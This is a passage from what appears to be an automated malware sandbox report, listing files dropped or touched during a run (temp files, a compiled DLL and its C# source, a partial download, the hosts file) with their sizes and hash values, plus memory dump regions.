                                                  30d01d34a47b64a9f4d6610abf7e57dce0763dbc

                                                  SHA256

                                                  205b791e2b552457364d4cb1bd91940c5887872e301fd9fa0cc2be7745a237a7

                                                  SHA512

                                                  aaf289310337e12a095757c411ddf8979e888aabfe1b7b58eec4231ef16feef1d469200aba2834b33ee0b480558bce6e16df88b5f4757a370fa5bfd3fbf893c1

                                                • C:\Users\Admin\AppData\Local\Temp\RESA0D4.tmp

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  b5880a9b84d2a7d3566517d772b8291f

                                                  SHA1

                                                  9d6d986672d3eb96e29c0a75c9e6b60e754bf905

                                                  SHA256

                                                  00bb026e1c949db5f27a2a8000ea9c6f6bd0b48f0fdeae08ac68daff0a387a72

                                                  SHA512

                                                  0de2b31d5012acf16ee7821c3c67d35966b500748eaf3a4f95fa2049ed96c6083c0971fa95a81bdab2858c1c29c40a560e3b3d903c8c94abe2062967e0dfb0ac

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oepbqdpe.d3q.ps1

                                                  Filesize

                                                  60B

                                                  MD5

                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                  SHA1

                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                  SHA256

                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                  SHA512

                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                • C:\Users\Admin\AppData\Local\Temp\jigjwj0s\jigjwj0s.dll

                                                  Filesize

                                                  4KB

                                                  MD5

                                                  9fb09230edb68ebb9c1120e8bc82e3d9

                                                  SHA1

                                                  e24454997a994efb57b22d340dee5be2beb4cb52

                                                  SHA256

                                                  941e8cb17e4f71e9f87f1646b353921b2b6b8185b38f45684929f7d8c290af91

                                                  SHA512

                                                  d19e91cf9ddb387d5c095ad84fde0d056240769f6536372470d126cf09d194798552068c362f84882c424d27c8729e71e37c9336d35805904710e217c1cab149

                                                • C:\Users\Admin\Downloads\Unconfirmed 245463.crdownload

                                                  Filesize

                                                  4.0MB

                                                  MD5

                                                  a783e06bd247517b59e133458b4bf1d8

                                                  SHA1

                                                  7a87a29f58b3ca9209ea0307c5da863a274fc510

                                                  SHA256

                                                  647bd75cf5940c2449e4cb0352881b2625774a2cf9166e6af5246ba2f5913d87

                                                  SHA512

                                                  ad5028ede624c837d57ce38ed8aadcf401035fa62ef3c57000642f5f1363917f8a7485f228bf61c3af836acc81fc79818ecaa9968313e39c6bc53a703f1f91b5

                                                • C:\Windows\system32\drivers\etc\hosts

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  6e2386469072b80f18d5722d07afdc0b

                                                  SHA1

                                                  032d13e364833d7276fcab8a5b2759e79182880f

                                                  SHA256

                                                  ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                  SHA512

                                                  e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                • \??\c:\Users\Admin\AppData\Local\Temp\jigjwj0s\CSCD80E0F81D8EC42899DC7C56FE691BC6A.TMP

                                                  Filesize

                                                  652B

                                                  MD5

                                                  f9cc1cd4c17a9314b98e4c8cb3f2acdc

                                                  SHA1

                                                  5f95f688c28d234a2439bc3ac805d5122078f20a

                                                  SHA256

                                                  fae2bfd621332540d9e368cb57817f5cb2e314d4a7de7a4e766539b25b0a8f2e

                                                  SHA512

                                                  3f267f118cf0fc49e09dea28b86b4dcff29a66c7165de2b4c500eba9b80f2c0492375dc6731d792fd9ce0c22ec8f03b188192153ba532efe86be77b41af1df1e

                                                • \??\c:\Users\Admin\AppData\Local\Temp\jigjwj0s\jigjwj0s.0.cs

                                                  Filesize

                                                  1004B

                                                  MD5

                                                  c76055a0388b713a1eabe16130684dc3

                                                  SHA1

                                                  ee11e84cf41d8a43340f7102e17660072906c402

                                                  SHA256

                                                  8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                  SHA512

                                                  22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                • \??\c:\Users\Admin\AppData\Local\Temp\jigjwj0s\jigjwj0s.cmdline

                                                  Filesize

                                                  607B

                                                  MD5

                                                  222018dba3cfb9de0825f48f1bc78001

                                                  SHA1

                                                  b592b8b201747f256684aa038e9d823ea17f12e7

                                                  SHA256

                                                  babc18e8e5a88d64c50e1b85a801c2c0b8cc2df77a7adce62821b7ad40655f9b

                                                  SHA512

                                                  82866b48ca814bdef671478e07975b9d74bca8e72f24175fa3c090f190e647c33d0ffee7ac56658a1e5aead6a2e9dd80addc4f09f70b31e7a318da3878694234

                                                • \??\pipe\LOCAL\crashpad_2652_OFSAYGRYUTTVSYLR

                                                  MD5

                                                  d41d8cd98f00b204e9800998ecf8427e

                                                  SHA1

                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                  SHA256

                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                  SHA512

                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                • memory/4456-155-0x000001DAD1DE0000-0x000001DAD1DE8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                • memory/5304-79-0x0000020DE2280000-0x0000020DE22A2000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/5492-153-0x0000023571FD0000-0x0000023572A91000-memory.dmp

                                                  Filesize

                                                  10.8MB